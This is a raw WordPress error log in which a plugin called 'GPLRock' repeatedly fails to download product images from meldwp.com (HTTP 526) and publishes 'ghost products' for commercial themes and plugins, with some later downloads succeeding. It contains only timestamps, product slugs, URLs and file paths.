https://meldwp.com/wp-content/uploads/alices--lingerie-store-and-fashion-boutique-wordpress-theme-26516.webp [02-Apr-2026 09:47:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alices-lingerie-store-and-fashion-boutique-wordpress-theme [02-Apr-2026 09:47:46 UTC] GPLRock: Image download failed for product facdori-factory-and-industrial-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/accordionza---jquery-plugin-3926.webp for product accordionza-jquery-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:48 UTC] GPLRock WARNING: Image download failed for product accordionza-jquery-plugin. URL: https://meldwp.com/wp-content/uploads/accordionza---jquery-plugin-3926.webp [02-Apr-2026 09:47:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: accordionza-jquery-plugin [02-Apr-2026 09:47:48 UTC] GPLRock: Image download failed for product fat-event-wordpress-event-and-calendar-booking (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:48 UTC] GPLRock: Image download failed for product facdori-factory-and-industrial-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:50 UTC] GPLRock: Image download failed for product fat-event-wordpress-event-and-calendar-booking (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/facdori---factory-and-industrial-business-wordpress-theme-14768.webp for product facdori-factory-and-industrial-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:50 UTC] GPLRock: Image download failed for product facdori-factory-and-industrial-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fat-event---wordpress-event-and-calendar-booking-16396.webp for product fat-event-wordpress-event-and-calendar-booking after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:52 UTC] GPLRock: Image download failed for product fat-event-wordpress-event-and-calendar-booking (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:53 UTC] GPLRock: Image download failed for product facdori-factory-and-industrial-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:54 UTC] GPLRock: Image download failed for product fat-event-wordpress-event-and-calendar-booking (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/facdori---factory-and-industrial-business-wordpress-theme-14768.webp for product facdori-factory-and-industrial-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:55 UTC] GPLRock WARNING: Image download failed for product facdori-factory-and-industrial-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/facdori---factory-and-industrial-business-wordpress-theme-14768.webp [02-Apr-2026 09:47:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: facdori-factory-and-industrial-business-wordpress-theme [02-Apr-2026 09:47:55 UTC] GPLRock: Image download failed for product olympus-html-social-network-toolkit (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fat-event---wordpress-event-and-calendar-booking-16396.webp for product fat-event-wordpress-event-and-calendar-booking after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:56 UTC] GPLRock WARNING: Image download failed for product fat-event-wordpress-event-and-calendar-booking. URL: https://meldwp.com/wp-content/uploads/fat-event---wordpress-event-and-calendar-booking-16396.webp [02-Apr-2026 09:47:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fat-event-wordpress-event-and-calendar-booking [02-Apr-2026 09:47:57 UTC] GPLRock: Image download failed for product woocommerce-quickbooks-connector-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:57 UTC] GPLRock: Image download failed for product olympus-html-social-network-toolkit (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:59 UTC] GPLRock: Image download failed for product woocommerce-quickbooks-connector-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/olympus---html-social-network-toolkit-19347.webp for product olympus-html-social-network-toolkit after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:59 UTC] GPLRock: Image download failed for product olympus-html-social-network-toolkit (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-quickbooks-connector-plugin-5308.webp for product woocommerce-quickbooks-connector-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:01 UTC] GPLRock: Image download failed for product woocommerce-quickbooks-connector-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:01 UTC] GPLRock: Image download failed for product olympus-html-social-network-toolkit (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:03 UTC] GPLRock: Image download failed for product woocommerce-quickbooks-connector-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/olympus---html-social-network-toolkit-19347.webp for product olympus-html-social-network-toolkit after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:03 UTC] GPLRock WARNING: Image download failed for product olympus-html-social-network-toolkit. URL: https://meldwp.com/wp-content/uploads/olympus---html-social-network-toolkit-19347.webp [02-Apr-2026 09:48:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: olympus-html-social-network-toolkit [02-Apr-2026 09:48:04 UTC] GPLRock: Image download failed for product nativechurch-responsive-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-quickbooks-connector-plugin-5308.webp for product woocommerce-quickbooks-connector-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:05 UTC] GPLRock WARNING: Image download failed for product woocommerce-quickbooks-connector-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-quickbooks-connector-plugin-5308.webp [02-Apr-2026 09:48:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-quickbooks-connector-plugin [02-Apr-2026 09:48:05 UTC] GPLRock: Image download failed for product elementor-widgets-mega-pack-addons-for-elementor-page-builder-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:06 UTC] GPLRock: Image download failed for product nativechurch-responsive-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:07 UTC] GPLRock: Image download failed for product elementor-widgets-mega-pack-addons-for-elementor-page-builder-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nativechurch---responsive-html5-template-20051.webp for product nativechurch-responsive-html5-template after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:08 UTC] GPLRock: Image download failed for product nativechurch-responsive-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-widgets-mega-pack---addons-for-elementor-page-builder-wordpress-plugin-3338.webp for product elementor-widgets-mega-pack-addons-for-elementor-page-builder-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:10 UTC] GPLRock: Image download failed for product elementor-widgets-mega-pack-addons-for-elementor-page-builder-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:10 UTC] GPLRock: Image download failed for product nativechurch-responsive-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:12 UTC] GPLRock: Image download failed for product elementor-widgets-mega-pack-addons-for-elementor-page-builder-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nativechurch---responsive-html5-template-20051.webp for product nativechurch-responsive-html5-template after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:12 UTC] GPLRock WARNING: Image download failed for product nativechurch-responsive-html5-template. URL: https://meldwp.com/wp-content/uploads/nativechurch---responsive-html5-template-20051.webp [02-Apr-2026 09:48:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nativechurch-responsive-html5-template [02-Apr-2026 09:48:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-widgets-mega-pack---addons-for-elementor-page-builder-wordpress-plugin-3338.webp for product elementor-widgets-mega-pack-addons-for-elementor-page-builder-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:14 UTC] GPLRock WARNING: Image download failed for product elementor-widgets-mega-pack-addons-for-elementor-page-builder-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/elementor-widgets-mega-pack---addons-for-elementor-page-builder-wordpress-plugin-3338.webp [02-Apr-2026 09:48:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elementor-widgets-mega-pack-addons-for-elementor-page-builder-wordpress-plugin [02-Apr-2026 09:48:14 UTC] GPLRock: Image download failed for product kentharadio-addon-for-kentha-music-wordpress-theme-to-add-radio-station-and-schedule-functionality (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:16 UTC] GPLRock: Image download failed for product kentharadio-addon-for-kentha-music-wordpress-theme-to-add-radio-station-and-schedule-functionality (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kentharadio---addon-for-kentha-music-wordpress-theme-to-add-radio-station-and-sc-15148.webp for product kentharadio-addon-for-kentha-music-wordpress-theme-to-add-radio-station-and-schedule-functionality after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:18 UTC] GPLRock: Image download failed for product kentharadio-addon-for-kentha-music-wordpress-theme-to-add-radio-station-and-schedule-functionality (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:20 UTC] GPLRock: Image download failed for product kentharadio-addon-for-kentha-music-wordpress-theme-to-add-radio-station-and-schedule-functionality (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:22 UTC] GPLRock: Image downloaded successfully for product team-booking-wordpress-booking-and-appointment-scheduling-system (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f92ec993.webp [02-Apr-2026 09:48:22 UTC] GPLRock: Using pre-downloaded image for product team-booking-wordpress-booking-and-appointment-scheduling-system: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f92ec993.webp [02-Apr-2026 09:48:22 UTC] GPLRock: Ghost product published with image - Product ID: team-booking-wordpress-booking-and-appointment-scheduling-system [02-Apr-2026 09:48:22 UTC] GPLRock: Image download failed for product advanced-masonry-portfolio-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kentharadio---addon-for-kentha-music-wordpress-theme-to-add-radio-station-and-sc-15148.webp for product kentharadio-addon-for-kentha-music-wordpress-theme-to-add-radio-station-and-schedule-functionality after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:22 UTC] GPLRock WARNING: Image download failed for product kentharadio-addon-for-kentha-music-wordpress-theme-to-add-radio-station-and-schedule-functionality. URL: https://meldwp.com/wp-content/uploads/kentharadio---addon-for-kentha-music-wordpress-theme-to-add-radio-station-and-sc-15148.webp [02-Apr-2026 09:48:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kentharadio-addon-for-kentha-music-wordpress-theme-to-add-radio-station-and-schedule-functionality [02-Apr-2026 09:48:24 UTC] GPLRock: Image download failed for product advanced-masonry-portfolio-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-masonry-portfolio-builder-394.webp for product advanced-masonry-portfolio-builder after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:26 UTC] GPLRock: Image download failed for product advanced-masonry-portfolio-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:28 UTC] GPLRock: Image download failed for product advanced-masonry-portfolio-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-masonry-portfolio-builder-394.webp for product advanced-masonry-portfolio-builder after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:30 UTC] GPLRock WARNING: Image download failed for product advanced-masonry-portfolio-builder. URL: https://meldwp.com/wp-content/uploads/advanced-masonry-portfolio-builder-394.webp [02-Apr-2026 09:48:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advanced-masonry-portfolio-builder [02-Apr-2026 09:48:31 UTC] GPLRock: Image download failed for product yet-skin-add-on-for-go-pricing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:33 UTC] GPLRock: Image download failed for product yet-skin-add-on-for-go-pricing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yet-skin---add-on-for-go-pricing-28030.webp for product yet-skin-add-on-for-go-pricing after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:35 UTC] GPLRock: Image download failed for product yet-skin-add-on-for-go-pricing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:37 UTC] GPLRock: Image download failed for product yet-skin-add-on-for-go-pricing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yet-skin---add-on-for-go-pricing-28030.webp for product yet-skin-add-on-for-go-pricing after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:39 UTC] GPLRock WARNING: Image download failed for product yet-skin-add-on-for-go-pricing. URL: https://meldwp.com/wp-content/uploads/yet-skin---add-on-for-go-pricing-28030.webp [02-Apr-2026 09:48:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yet-skin-add-on-for-go-pricing [02-Apr-2026 09:48:39 UTC] GPLRock: Image download failed for product bazz-callback-widget-pro-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:41 UTC] GPLRock: Image download failed for product bazz-callback-widget-pro-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bazz-callback-widget-pro-wordpress-28667.webp for product bazz-callback-widget-pro-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:44 UTC] GPLRock: Image download failed for product bazz-callback-widget-pro-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:46 UTC] GPLRock: Image download failed for product bazz-callback-widget-pro-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bazz-callback-widget-pro-wordpress-28667.webp for product bazz-callback-widget-pro-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:48 UTC] GPLRock WARNING: Image download failed for product bazz-callback-widget-pro-wordpress. URL: https://meldwp.com/wp-content/uploads/bazz-callback-widget-pro-wordpress-28667.webp [02-Apr-2026 09:48:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bazz-callback-widget-pro-wordpress [02-Apr-2026 09:48:48 UTC] GPLRock: Image download failed for product woocommerce-cardstream-payment-gateway-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:50 UTC] GPLRock: Image download failed for product woocommerce-cardstream-payment-gateway-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-cardstream-payment-gateway-plugin-13962.webp for product woocommerce-cardstream-payment-gateway-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:52 UTC] GPLRock: Image download failed for product woocommerce-cardstream-payment-gateway-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:54 UTC] GPLRock: Image download failed for product woocommerce-cardstream-payment-gateway-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-cardstream-payment-gateway-plugin-13962.webp for product woocommerce-cardstream-payment-gateway-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:48:56 UTC] GPLRock WARNING: Image download failed for product woocommerce-cardstream-payment-gateway-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-cardstream-payment-gateway-plugin-13962.webp [02-Apr-2026 09:48:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-cardstream-payment-gateway-plugin [02-Apr-2026 09:48:57 UTC] GPLRock: Image download failed for product restrict-content-by-token-for-walogin-wordpress-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:48:59 UTC] GPLRock: Image download failed for product restrict-content-by-token-for-walogin-wordpress-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/restrict-content-by-token-for-walogin-wordpress--woocommerce-26446.webp for product restrict-content-by-token-for-walogin-wordpress-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:49:01 UTC] GPLRock: Image download failed for product restrict-content-by-token-for-walogin-wordpress-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:03 UTC] GPLRock: Image download failed for product restrict-content-by-token-for-walogin-wordpress-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/restrict-content-by-token-for-walogin-wordpress--woocommerce-26446.webp for product restrict-content-by-token-for-walogin-wordpress-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:49:05 UTC] GPLRock WARNING: Image download failed for product restrict-content-by-token-for-walogin-wordpress-woocommerce. URL: https://meldwp.com/wp-content/uploads/restrict-content-by-token-for-walogin-wordpress--woocommerce-26446.webp [02-Apr-2026 09:49:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: restrict-content-by-token-for-walogin-wordpress-woocommerce [02-Apr-2026 09:49:05 UTC] GPLRock: Image download failed for product payway-api-westpac-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:07 UTC] GPLRock: Image download failed for product payway-api-westpac-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/payway-api-westpac-gateway-for-woocommerce-14608.webp for product payway-api-westpac-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:49:10 UTC] GPLRock: Image download failed for product payway-api-westpac-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:12 UTC] GPLRock: Image download failed for product payway-api-westpac-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/payway-api-westpac-gateway-for-woocommerce-14608.webp for product payway-api-westpac-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:49:14 UTC] GPLRock WARNING: Image download failed for product payway-api-westpac-gateway-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/payway-api-westpac-gateway-for-woocommerce-14608.webp [02-Apr-2026 09:49:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: payway-api-westpac-gateway-for-woocommerce [02-Apr-2026 09:49:14 UTC] GPLRock: Image download failed for product wheel-of-fortune-html5-casino-game (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:16 UTC] GPLRock: Image download failed for product wheel-of-fortune-html5-casino-game (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wheel-of-fortune---html5-casino-game-8064.webp for product wheel-of-fortune-html5-casino-game after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:49:18 UTC] GPLRock: Image download failed for product wheel-of-fortune-html5-casino-game (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:20 UTC] GPLRock: Image download failed for product wheel-of-fortune-html5-casino-game (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wheel-of-fortune---html5-casino-game-8064.webp for product wheel-of-fortune-html5-casino-game after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:49:22 UTC] GPLRock WARNING: Image download failed for product wheel-of-fortune-html5-casino-game. URL: https://meldwp.com/wp-content/uploads/wheel-of-fortune---html5-casino-game-8064.webp [02-Apr-2026 09:49:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wheel-of-fortune-html5-casino-game [02-Apr-2026 09:49:23 UTC] GPLRock: Image download failed for product logo-showcase-logo-addons-for-wpbakery-page-builder-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:25 UTC] GPLRock: Image download failed for product logo-showcase-logo-addons-for-wpbakery-page-builder-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logo-showcase---logo-addons-for-wpbakery-page-builder-for-wordpress-12555.webp for product logo-showcase-logo-addons-for-wpbakery-page-builder-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:49:27 UTC] GPLRock: Image download failed for product logo-showcase-logo-addons-for-wpbakery-page-builder-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:29 UTC] GPLRock: Image download failed for product logo-showcase-logo-addons-for-wpbakery-page-builder-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logo-showcase---logo-addons-for-wpbakery-page-builder-for-wordpress-12555.webp for product logo-showcase-logo-addons-for-wpbakery-page-builder-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:49:31 UTC] GPLRock WARNING: Image download failed for product logo-showcase-logo-addons-for-wpbakery-page-builder-for-wordpress. URL: https://meldwp.com/wp-content/uploads/logo-showcase---logo-addons-for-wpbakery-page-builder-for-wordpress-12555.webp [02-Apr-2026 09:49:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: logo-showcase-logo-addons-for-wpbakery-page-builder-for-wordpress [02-Apr-2026 09:49:31 UTC] GPLRock: Image download failed for product blog-layouts-social-media-chat-widget-for-elementor-wordpress-plugin-blogsqode-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:33 UTC] GPLRock: Image download failed for product blog-layouts-social-media-chat-widget-for-elementor-wordpress-plugin-blogsqode-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blog-layouts--social-media-chat-widget-for-elementor-wordpress-plugin---blogsqod-13261.webp for product blog-layouts-social-media-chat-widget-for-elementor-wordpress-plugin-blogsqode-addon after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:49:36 UTC] GPLRock: Image download failed for product blog-layouts-social-media-chat-widget-for-elementor-wordpress-plugin-blogsqode-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:38 UTC] GPLRock: Image download failed for product blog-layouts-social-media-chat-widget-for-elementor-wordpress-plugin-blogsqode-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:49:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blog-layouts--social-media-chat-widget-for-elementor-wordpress-plugin---blogsqod-13261.webp for product blog-layouts-social-media-chat-widget-for-elementor-wordpress-plugin-blogsqode-addon after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:49:40 UTC] GPLRock WARNING: Image download failed for product blog-layouts-social-media-chat-widget-for-elementor-wordpress-plugin-blogsqode-addon. URL: https://meldwp.com/wp-content/uploads/blog-layouts--social-media-chat-widget-for-elementor-wordpress-plugin---blogsqod-13261.webp [02-Apr-2026 09:49:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blog-layouts-social-media-chat-widget-for-elementor-wordpress-plugin-blogsqode-addon [02-Apr-2026 09:49:49 UTC] GPLRock: Image downloaded successfully for product frontone-creative-photography-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e01bcf00.webp [02-Apr-2026 09:49:49 UTC] GPLRock: Using pre-downloaded image for product frontone-creative-photography-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e01bcf00.webp [02-Apr-2026 09:49:49 UTC] GPLRock: Ghost product published with image - Product ID: frontone-creative-photography-template-kit [02-Apr-2026 09:49:50 UTC] GPLRock: Image downloaded successfully for product frontfour-creative-photography-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c3bf30eb.webp [02-Apr-2026 09:49:50 UTC] GPLRock: Using pre-downloaded image for product frontfour-creative-photography-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c3bf30eb.webp [02-Apr-2026 09:49:50 UTC] GPLRock: Ghost product published with image - Product ID: frontfour-creative-photography-template-kit [02-Apr-2026 09:49:51 UTC] GPLRock: Image downloaded successfully for product fresh-life-coach-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ea8106df.webp [02-Apr-2026 09:49:52 UTC] GPLRock: Using pre-downloaded image for product fresh-life-coach-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ea8106df.webp [02-Apr-2026 09:49:52 UTC] GPLRock: Ghost product published with image - Product ID: fresh-life-coach-elementor-template-kit [02-Apr-2026 09:49:53 UTC] GPLRock: Image downloaded successfully for product frenzy-food-delivery-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fb3f587d.webp [02-Apr-2026 09:49:53 UTC] GPLRock: Using pre-downloaded image for product frenzy-food-delivery-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fb3f587d.webp [02-Apr-2026 09:49:53 UTC] GPLRock: Ghost product published with image - Product ID: frenzy-food-delivery-restaurant-elementor-template-kit [02-Apr-2026 09:49:54 UTC] GPLRock: Image downloaded successfully for product frenchbulls-dog-breeder-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ab7c3e3b.webp [02-Apr-2026 09:49:54 UTC] GPLRock: Using pre-downloaded image for product frenchbulls-dog-breeder-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ab7c3e3b.webp [02-Apr-2026 09:49:54 UTC] GPLRock: Ghost product published with image - Product ID: frenchbulls-dog-breeder-elementor-template-kit [02-Apr-2026 09:49:56 UTC] GPLRock: Image downloaded successfully for product fouens-cleaning-home-maintenance-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3849773c.webp [02-Apr-2026 09:49:56 UTC] GPLRock: Using pre-downloaded image for product fouens-cleaning-home-maintenance-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3849773c.webp [02-Apr-2026 09:49:56 UTC] GPLRock: Ghost product published with image - Product ID: fouens-cleaning-home-maintenance-company-elementor-template-kit [02-Apr-2026 09:49:57 UTC] GPLRock: Image downloaded successfully for product foturo-photography-portfolio-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-380264f5.webp [02-Apr-2026 09:49:57 UTC] 